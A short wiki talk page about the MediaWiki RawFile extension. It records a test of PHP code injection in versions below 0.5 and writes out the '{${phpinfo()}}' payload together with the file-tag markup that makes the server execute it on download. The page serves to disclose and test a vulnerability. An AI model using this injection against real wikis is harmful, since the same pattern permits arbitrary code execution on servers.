Talk:Mediawiki RawFile

From YobiWiki
Jump to navigation Jump to search

Testing PHP code injection on Rawfile < 0.5 :
Adding this code to a wikipage: 

<nowiki>{${phpinfo()}}</nowiki>
[{{#file: myscript.sh}} as myscript.sh]
<source lang=bash>
#!/bin/bash

echo 'Hello world!'
exit 0
</source>

and trying to download myscript.sh will execute phpinfo() on the server.

Retrieved from "https://wiki.yobi.be/index.php?title=Talk:Mediawiki_RawFile&oldid=8555"